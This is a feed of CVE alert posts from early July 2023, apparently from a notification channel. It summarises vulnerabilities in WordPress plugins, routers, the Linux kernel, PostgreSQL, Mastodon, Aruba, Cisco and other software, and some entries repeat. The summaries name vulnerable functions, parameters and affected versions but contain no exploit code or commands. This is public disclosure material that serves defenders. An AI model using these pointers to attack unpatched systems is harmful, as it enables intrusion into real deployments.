🚨 CVE-2023-20767In pqframework, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07629585; Issue ID: ALPS07629584.🎖@cveNotify |
|
| 2023-07-10 05:58:55 |
🚨 CVE-2023-20758In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07636133; Issue ID: ALPS07636130.🎖@cveNotify |
|
| 2023-07-10 05:58:54 |
🚨 CVE-2023-20768In ion, there is a possible out of bounds read due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07560720; Issue ID: ALPS07559800.🎖@cveNotify |
|
| 2023-07-10 05:58:51 |
🚨 CVE-2023-20759In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07636133; Issue ID: ALPS07634601.🎖@cveNotify |
|
| 2023-07-10 05:58:50 |
🚨 CVE-2023-37286SmartSoft SmartBPM.NET has a vulnerability of using hard-coded machine key. An unauthenticated remote attacker can use the machine key to send serialized payload to the server to execute arbitrary code and disrupt service.🎖@cveNotify |
|
| 2023-07-10 05:58:49 |
🚨 CVE-2023-37288SmartBPM.NET has a vulnerability of using hard-coded authentication key. An unauthenticated remote attacker can exploit this vulnerability to access system with regular user privilege to read application data, and execute submission and approval processes.🎖@cveNotify |
|
| 2023-07-08 10:58:16 |
🚨 CVE-2023-3551 Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.10.🎖@cveNotify |
|
| 2023-07-08 10:58:15 |
🚨 CVE-2023-3552Improper Encoding or Escaping of Output in GitHub repository nilsteampassnet/teampass prior to 3.0.10.🎖@cveNotify |
|
| 2023-07-08 10:58:14 |
🚨 CVE-2023-3553Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository nilsteampassnet/teampass prior to 3.0.10.🎖@cveNotify |
|
| 2023-07-08 05:58:24 |
🚨 CVE-2021-4401The Style Kits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.0. This is due to missing or incorrect nonce validation on the update_posts_stylekit() function. This makes it possible for unauthenticated attackers to update style kits for posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 05:58:20 |
🚨 CVE-2021-4399The Edwiser Bridge plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including,2.0.6. This is due to missing or incorrect nonce validation on the user_data_synchronization_initiater(), course_synchronization_initiater(), users_link_to_moodle_synchronization(), connection_test_initiater(), admin_menus(), and subscribe_handler() function. This makes it possible for unauthenticated attackers to perform unauthorized actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 05:58:19 |
🚨 CVE-2023-26136Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.🎖@cveNotify |
|
| 2023-07-08 05:58:18 |
🚨 CVE-2021-4390The Contact Form 7 Style plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2. This is due to missing or incorrect nonce validation on the manage_wp_posts_be_qe_save_post() function. This makes it possible for unauthenticated attackers to quick edit templates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 05:58:15 |
🚨 CVE-2021-4391The Ultimate Gift Cards for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the mwb_wgm_save_post() function. This makes it possible for unauthenticated attackers to modify product gift card details via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 05:58:14 |
🚨 CVE-2021-4394The Locations plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.1. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to update custom field meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 05:58:13 |
🚨 CVE-2020-36747The Lightweight Sidebar Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the metabox_save() function. This makes it possible for unauthenticated attackers to save metbox data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 00:58:30 |
🚨 CVE-2023-20690In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664735; Issue ID: ALPS07664735.🎖@cveNotify |
|
| 2023-07-08 00:58:29 |
🚨 CVE-2023-20753In rpmb, there is a possible out of bounds write due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07460390; Issue ID: ALPS07588667.🎖@cveNotify |
|
| 2023-07-08 00:58:25 |
🚨 CVE-2023-20693In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664711; Issue ID: ALPS07664711.🎖@cveNotify |
|
| 2023-07-08 00:58:24 |
🚨 CVE-2023-20692In wlan firmware, there is possible system crash due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664720; Issue ID: ALPS07664720.🎖@cveNotify |
|
| 2023-07-08 00:58:23 |
🚨 CVE-2023-20691In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664731; Issue ID: ALPS07664731.🎖@cveNotify |
|
| 2023-07-08 00:58:19 |
🚨 CVE-2023-37360pacparser_find_proxy in Pacparser before 1.4.2 allows JavaScript injection, and possibly privilege escalation, when the attacker controls the URL (which may be realistic within enterprise security products).🎖@cveNotify |
|
| 2023-07-08 00:58:18 |
🚨 CVE-2020-36736The WooCommerce Checkout & Funnel Builder by CartFlows plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.15. This is due to missing or incorrect nonce validation on the export_json, import_json, and status_logs_file functions. This makes it possible for unauthenticated attackers to import/export settings and trigger logs showing via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 00:58:17 |
🚨 CVE-2020-36735The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.3. This is due to missing or incorrect nonce validation on the handle_leave_calendar_filter, add_enable_disable_option_save, leave_policies, process_bulk_action, and process_crm_contact functions. This makes it possible for unauthenticated attackers to modify the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-08 00:58:13 |
🚨 CVE-2023-33298com.perimeter81.osx.HelperTool in Perimeter81 10.0.0.19 on macOS allows Local Privilege Escalation (to root) via shell metacharacters in usingCAPath.🎖@cveNotify |
|
| 2023-07-08 00:58:12 |
🚨 CVE-2023-37270Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.🎖@cveNotify |
|
| 2023-07-07 20:58:15 |
🚨 CVE-2022-45392Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by attackers with Extended Read permission, or access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-07-07 18:58:38 |
🚨 CVE-2023-3542A vulnerability was found in ThinuTech ThinuCMS 1.5 and classified as problematic. Affected by this issue is some unknown functionality of the file /contact.php. The manipulation of the argument name/body leads to cross site scripting. The attack may be launched remotely. VDB-233294 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-07 18:58:37 |
🚨 CVE-2023-33715A buffer overflow in ACDSee Free v2.0.2.227 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.🎖@cveNotify |
|
| 2023-07-07 18:58:36 |
🚨 CVE-2023-27845SQL injection vulnerability found in PrestaShop lekerawen_ocs before v.1.4.1 allow a remote attacker to gain privileges via the KerawenHelper::setCartOperationInfo, and KerawenHelper::resetCheckoutSessionData components.🎖@cveNotify |
|
| 2023-07-07 18:58:35 |
🚨 CVE-2023-37062Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the course categories' definition.🎖@cveNotify |
|
| 2023-07-07 18:58:34 |
🚨 CVE-2023-37063Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the careers & promotions management section.🎖@cveNotify |
|
| 2023-07-07 18:58:33 |
🚨 CVE-2023-37065Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the session category management section.🎖@cveNotify |
|
| 2023-07-07 18:58:32 |
🚨 CVE-2023-37064Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the extra fields management section.🎖@cveNotify |
|
| 2023-07-07 18:58:31 |
🚨 CVE-2023-37066Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the skills wheel.🎖@cveNotify |
|
| 2023-07-07 18:58:29 |
🚨 CVE-2023-37067Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the classes/usergroups management section.🎖@cveNotify |
|
| 2023-07-07 18:58:28 |
🚨 CVE-2023-37264Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 0.35.0, pipelines do not validate child UIDs, which means that a user that has access to create TaskRuns can create their own Tasks that the Pipelines controller will accept as the child Task. While the software stores and validates the PipelineRun's (api version, kind, name, uid) in the child Run's OwnerReference, it only store (api version, kind, name) in the ChildStatusReference. This means that if a client had access to create TaskRuns on a cluster, they could create a child TaskRun for a pipeline with the same name + owner reference, and the Pipeline controller picks it up as if it was the original TaskRun. This is problematic since it can let users modify the config of Pipelines at runtime, which violates SLSA L2 Service Generated / Non-falsifiable requirements. This issue can be used to trick the Pipeline controller into associating unrelated Runs to the Pipeline, feeding its data through the rest of the Pipeline. This requires access to create TaskRuns, so impact may vary depending on one Tekton setup. If users already have unrestricted access to create any Task/PipelineRun, this does not grant any additional capabilities. As of time of publication, there are no known patches for this issue.🎖@cveNotify |
|
| 2023-07-07 18:58:24 |
🚨 CVE-2023-3543A vulnerability was found in GZ Scripts Availability Booking Calendar PHP 1.8. It has been classified as problematic. This affects an unknown part of the file load.php of the component HTTP POST Request Handler. The manipulation of the argument cid/first_name/second_name/address_1/country leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-233295. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-07 18:58:23 |
🚨 CVE-2023-3544A vulnerability was found in GZ Scripts Time Slot Booking Calendar PHP 1.8. It has been declared as problematic. This vulnerability affects unknown code of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-233296. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-07 18:58:22 |
🚨 CVE-2021-42307Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-07 18:58:21 |
🚨 CVE-2021-34506Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-07 18:58:20 |
🚨 CVE-2021-34475Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-07 18:58:16 |
🚨 CVE-2021-31982Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-07 18:58:15 |
🚨 CVE-2023-3338A flaw null pointer dereference in the Linux kernel DECnet networking protocol was found. A remote user could use this flaw to crash the system.🎖@cveNotify |
|
| 2023-07-07 18:58:14 |
🚨 CVE-2023-36467AWS data.all is an open source development framework to help users build a data marketplace on Amazon Web Services. data.all versions 1.2.0 through 1.5.1 do not prevent remote code execution when a user injects Python commands into the ‘Template’ field when configuring a data pipeline. The issue can only be triggered by authenticated users. A fix for this issue is available in data.all version 1.5.2 and later. There is no recommended work around.🎖@cveNotify |
|
| 2023-07-07 18:58:13 |
🚨 CVE-2023-35987PiiGAB M-Bus contains hard-coded credentials which it uses for authentication.🎖@cveNotify |
|
| 2023-07-07 17:58:33 |
🚨 CVE-2023-30504Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-07-07 17:58:32 |
🚨 CVE-2023-30505Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-07-07 17:58:31 |
🚨 CVE-2023-30506Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-07-07 17:58:30 |
🚨 CVE-2023-30508Multiple authenticated path traversal vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface. Successful exploitation of these vulnerabilities result in the ability to read arbitrary files on the underlying operating system, including sensitive system files.🎖@cveNotify |
|
| 2023-07-07 17:58:26 |
🚨 CVE-2023-30509Multiple authenticated path traversal vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface. Successful exploitation of these vulnerabilities result in the ability to read arbitrary files on the underlying operating system, including sensitive system files.🎖@cveNotify |
|
| 2023-07-07 17:58:25 |
🚨 CVE-2022-48506A flawed pseudorandom number generator in Dominion Voting Systems ImageCast Precinct (ICP and ICP2) and ImageCast Evolution (ICE) scanners allows anyone to determine the order in which ballots were cast from public ballot-level data, allowing deanonymization of voted ballots, in several types of scenarios. This issue was observed for use of the following versions of Democracy Suite: 5.2, 5.4-NM, 5.5, 5.5-A, 5.5-B, 5.5-C, 5.5-D, 5.7-A, 5.10, 5.10A, 5.15. NOTE: the Democracy Suite 5.17 EAC Certificate of Conformance mentions "Improved pseudo random number algorithm," which may be relevant.🎖@cveNotify |
|
| 2023-07-07 17:58:24 |
🚨 CVE-2023-37144Tenda AC10 v15.03.06.26 was discovered to contain a command injection vulnerability via the mac parameter in the function formWriteFacMac.🎖@cveNotify |
|
| 2023-07-07 17:58:20 |
🚨 CVE-2023-37145TOTOLINK LR350 V9.3.5u.6369_B20220309 was discovered to contain a command injection vulnerability via the hostname parameter in the setOpModeCfg function.🎖@cveNotify |
|
| 2023-07-07 17:58:19 |
🚨 CVE-2023-37146TOTOLINK LR350 V9.3.5u.6369_B20220309 was discovered to contain a command injection vulnerability via the FileName parameter in the UploadFirmwareFile function.🎖@cveNotify |
|
| 2023-07-07 17:58:18 |
🚨 CVE-2023-3537A vulnerability classified as problematic has been found in SimplePHPscripts News Script PHP Pro 2.4. This affects an unknown part of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-233289 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-07 17:58:14 |
🚨 CVE-2023-3538A vulnerability classified as problematic was found in SimplePHPscripts Photo Gallery PHP 2.0. This vulnerability affects unknown code of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. VDB-233290 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-07 17:58:13 |
🚨 CVE-2023-37308Zoho ManageEngine ADAudit Plus before 7100 allows XSS via the username field.🎖@cveNotify |
|
| 2023-07-07 17:58:12 |
🚨 CVE-2023-3536A vulnerability was found in SimplePHPscripts Funeral Script PHP 3.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233288.🎖@cveNotify |
|
| 2023-07-07 14:58:39 |
🚨 CVE-2023-21512Improper Knox ID validation logic in notification framework prior to SMR Jun-2023 Release 1 allows local attackers to read work profile notifications without proper access permission.🎖@cveNotify |
|
| 2023-07-07 14:58:37 |
🚨 CVE-2023-20119Multiple vulnerabilities in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email and Web Manager; Cisco Secure Email Gateway, formerly Cisco Email Security Appliance (ESA); and Cisco Secure Web Appliance, formerly Cisco Web Security Appliance (WSA), could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-07-07 14:58:36 |
🚨 CVE-2023-20105Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated attacker with Administrator-level read-only credentials to elevate their privileges to Administrator with read-write credentials on an affected system. Note: "Cisco Expressway Series" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-07-07 14:58:34 |
🚨 CVE-2023-34197Zoho ManageEngine ServiceDesk Plus before 14202, ServiceDesk Plus MSP before 14300, and SupportCenter Plus before 14300 have a privilege escalation vulnerability in the Release module that allows unprivileged users to access the Reminders of a release ticket and make modifications.🎖@cveNotify |
|
| 2023-07-07 14:58:33 |
🚨 CVE-2023-37308Zoho ManageEngine ADAudit Plus before 7100 allows XSS via the username field.🎖@cveNotify |
|
| 2023-07-07 14:58:32 |
🚨 CVE-2023-3535A vulnerability was found in SimplePHPscripts FAQ Script PHP 2.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-233287.🎖@cveNotify |
|
| 2023-07-07 14:58:30 |
🚨 CVE-2023-3536A vulnerability was found in SimplePHPscripts Funeral Script PHP 3.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233288.🎖@cveNotify |
|
| 2023-07-07 14:58:29 |
🚨 CVE-2023-21517Heap out-of-bound write vulnerability in Exynos baseband prior to SMR Jun-2023 Release 1 allows remote attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-07 14:58:27 |
🚨 CVE-2023-20028Multiple vulnerabilities in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email and Web Manager; Cisco Secure Email Gateway, formerly Cisco Email Security Appliance (ESA); and Cisco Secure Web Appliance, formerly Cisco Web Security Appliance (WSA), could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-07-07 14:58:26 |
🚨 CVE-2023-3138A vulnerability was found in libX11. The security flaw occurs because the functions in src/InitExt.c in libX11 do not check that the values provided for the Request, Event, or Error IDs are within the bounds of the arrays that those functions write to, using those IDs as array indexes. They trust that they were called with values provided by an Xserver adhering to the bounds specified in the X11 protocol, as all X servers provided by X.Org do. As the protocol only specifies a single byte for these values, an out-of-bounds value provided by a malicious server (or a malicious proxy-in-the-middle) can only overwrite other portions of the Display structure and not write outside the bounds of the Display structure itself, possibly causing the client to crash with this memory corruption.🎖@cveNotify |
|
| 2023-07-07 14:58:24 |
🚨 CVE-2023-1295A time-of-check to time-of-use issue exists in io_uring subsystem's IORING_OP_CLOSE operation in the Linux kernel's versions 5.6 - 5.11 (inclusive), which allows a local user to elevate their privileges to root. Introduced in b5dba59e0cf7e2cc4d3b3b1ac5fe81ddf21959eb, patched in 9eac1904d3364254d622bf2c771c4f85cd435fc2, backported to stable in 788d0824269bef539fe31a785b1517882eafed93.🎖@cveNotify |
|
| 2023-07-07 14:58:23 |
🚨 CVE-2023-32623Directory traversal vulnerability in Snow Monkey Forms versions v5.1.0 and earlier allows a remote unauthenticated attacker to delete arbitrary files on the server.🎖@cveNotify |
|
| 2023-07-07 14:58:21 |
🚨 CVE-2023-34924H3C Magic B1STW B1STV100R012 was discovered to contain a stack overflow via the function SetAPInfoById. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2023-07-07 14:58:20 |
🚨 CVE-2020-36744The NotificationX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.2. This is due to missing or incorrect nonce validation on the generate_conversions() function. This makes it possible for unauthenticated attackers to generate conversions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-07 14:58:16 |
🚨 CVE-2020-36742The Custom Field Template plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on the edit_meta_value() function. This makes it possible for unauthenticated attackers to edit meta field values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-07 14:58:15 |
🚨 CVE-2020-36741The MultiVendorX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.7. This is due to missing or incorrect nonce validation on the submit_comment() function. This makes it possible for unauthenticated attackers to submit comments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-07 14:58:14 |
🚨 CVE-2020-36743The Product Catalog Simple plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.13. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to update product meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-07 14:58:13 |
🚨 CVE-2023-3534A vulnerability was found in SourceCodester Shopping Website 1.0. It has been classified as critical. Affected is an unknown function of the file check_availability.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-233286 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-07 12:58:14 |
🚨 CVE-2023-33008Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache Johnzon.A malicious attacker can craft up some JSON input that uses large numbers (numbers such as 1e20000000) that Apache Johnzon will deserialize into BigDecimal and maybe use numbers too large which may result in a slow conversion (Denial of service risk). Apache Johnzon 1.2.21 mitigates this by setting a scale limit of 1000 (by default) to the BigDecimal. This issue affects Apache Johnzon: through 1.2.20.🎖@cveNotify |
|
| 2023-07-07 10:58:14 |
🚨 CVE-2023-32183Incorrect Default Permissions vulnerability in the openSUSE Tumbleweed hawk2 package allows users with access to the hacluster to escalate to rootThis issue affects openSUSE Tumbleweed.🎖@cveNotify |
|
| 2023-07-07 10:58:13 |
🚨 CVE-2022-4059The Cryptocurrency Widgets Pack WordPress plugin before 2.0 does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.🎖@cveNotify |
|
| 2023-07-07 06:58:36 |
🚨 CVE-2020-36741The MultiVendorX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.7. This is due to missing or incorrect nonce validation on the submit_comment() function. This makes it possible for unauthenticated attackers to submit comments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-07 06:58:35 |
🚨 CVE-2020-36744The NotificationX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.2. This is due to missing or incorrect nonce validation on the generate_conversions() function. This makes it possible for unauthenticated attackers to generate conversions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-07 06:58:34 |
🚨 CVE-2023-37302An issue was discovered in SiteLinksView.php in Wikibase in MediaWiki through 1.39.3. There is XSS via a crafted badge title attribute. This is also related to lack of escaping in wbTemplate (from resources/wikibase/templates.js) for quotes (which can be in a title attribute).🎖@cveNotify |
|
| 2023-07-07 06:58:33 |
🚨 CVE-2023-37304An issue was discovered in the DoubleWiki extension for MediaWiki through 1.39.3. includes/DoubleWiki.php allows XSS via the column alignment feature.🎖@cveNotify |
|
| 2023-07-07 06:58:29 |
🚨 CVE-2023-3491Unrestricted Upload of File with Dangerous Type in GitHub repository fossbilling/fossbilling prior to 0.5.3.🎖@cveNotify |
|
| 2023-07-07 06:58:28 |
🚨 CVE-2023-35890IBM WebSphere Application Server 8.5 and 9.0 could provide weaker than expected security, caused by the improper encoding in a local configuration file. IBM X-Force ID: 258637.🎖@cveNotify |
|
| 2023-07-07 06:58:27 |
🚨 CVE-2023-31606A Regular Expression Denial of Service (ReDoS) issue was discovered in the sanitize_html function of redcloth gem v4.0.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.🎖@cveNotify |
|
| 2023-07-07 06:58:26 |
🚨 CVE-2019-20503usrsctp before 2019-12-20 has out-of-bounds reads in sctp_load_addresses_from_init.🎖@cveNotify |
|
| 2023-07-07 06:58:22 |
🚨 CVE-2023-34995There are no requirements for setting a complex password for PiiGAB M-Bus, which could contribute to a successful brute force attack if the password is inline with recommended password guidelines.🎖@cveNotify |
|
| 2023-07-07 06:58:21 |
🚨 CVE-2023-35765PiiGAB M-Bus stores credentials in a plaintext file, which could allow a low-level user to gain admin credentials.🎖@cveNotify |
|
| 2023-07-07 06:58:20 |
🚨 CVE-2023-37192Memory management and protection issues in Bitcoin Core v22 allows attackers to modify the stored sending address within the app's memory, potentially allowing them to redirect Bitcoin transactions to wallets of their own choosing.🎖@cveNotify |
|
| 2023-07-07 06:58:19 |
🚨 CVE-2023-32652PiiGAB M-Bus does not validate identification strings before processing, which could make it vulnerable to cross-site scripting attacks.🎖@cveNotify |
|
| 2023-07-07 06:58:16 |
🚨 CVE-2023-34433PiiGAB M-Bus stores passwords using a weak hash algorithm.🎖@cveNotify |
|
| 2023-07-07 06:58:15 |
🚨 CVE-2023-36459Mastodon is a free, open-source social network server based on ActivityPub. Starting in version 1.3 and prior to versions 3.5.9, 4.0.5, and 4.1.3, an attacker using carefully crafted oEmbed data can bypass the HTML sanitization performed by Mastodon and include arbitrary HTML in oEmbed preview cards. This introduces a vector for cross-site scripting (XSS) payloads that can be rendered in the user's browser when a preview card for a malicious link is clicked through. Versions 3.5.9, 4.0.5, and 4.1.3 contain a patch for this issue.🎖@cveNotify |
|
| 2023-07-07 06:58:14 |
🚨 CVE-2023-36461Mastodon is a free, open-source social network server based on ActivityPub. When performing outgoing HTTP queries, Mastodon sets a timeout on individual read operations. Prior to versions 3.5.9, 4.0.5, and 4.1.3, a malicious server can indefinitely extend the duration of the response through slowloris-type attacks. This vulnerability can be used to keep all Mastodon workers busy for an extended duration of time, leading to the server becoming unresponsive. Versions 3.5.9, 4.0.5, and 4.1.3 contain a patch for this issue.🎖@cveNotify |
|
| 2023-07-07 06:58:13 |
🚨 CVE-2023-2727Users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers.🎖@cveNotify |
|
| 2023-07-06 21:58:38 |
🚨 CVE-2023-26965loadImage() in tools/tiffcrop.c in LibTIFF through 4.5.0 has a heap-based use after free via a crafted TIFF image.🎖@cveNotify |
|
| 2023-07-06 21:58:37 |
🚨 CVE-2023-34396Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache Struts: through 2.5.30, through 6.1.2.Upgrade to Struts 2.5.31 or 6.1.2.1 or greater🎖@cveNotify |
|
| 2023-07-06 21:58:36 |
🚨 CVE-2020-36732The crypto-js package before 3.2.1 for Node.js generates random numbers by concatenating the string "0." with an integer, which makes the output more predictable than necessary.🎖@cveNotify |
|
| 2023-07-06 21:58:35 |
🚨 CVE-2023-3141A use-after-free flaw was found in r592_remove in drivers/memstick/host/r592.c in media access in the Linux Kernel. This flaw allows a local attacker to crash the system at device disconnect, possibly leading to a kernel information leak.🎖@cveNotify |
|
| 2023-07-06 21:58:32 |
🚨 CVE-2023-2454schema_element defeats protective search_path changes; It was found that certain database calls in PostgreSQL could permit an authed attacker with elevated database-level privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 21:58:31 |
🚨 CVE-2023-2455Row security policies disregard user ID changes after inlining; PostgreSQL could permit incorrect policies to be applied in certain cases where role-specific policies are used and a given query is planned under one role and then executed under other roles. This scenario can happen under security definer functions or when a common user and query is planned initially and then re-used across multiple SET ROLEs. Applying an incorrect policy may permit a user to complete otherwise-forbidden reads and modifications. This affects only databases that have used CREATE POLICY to define a row security policy.🎖@cveNotify |
|
| 2023-07-06 21:58:30 |
🚨 CVE-2023-2183Grafana is an open-source platform for monitoring and observability. The option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.This might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.Users may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.🎖@cveNotify |
|
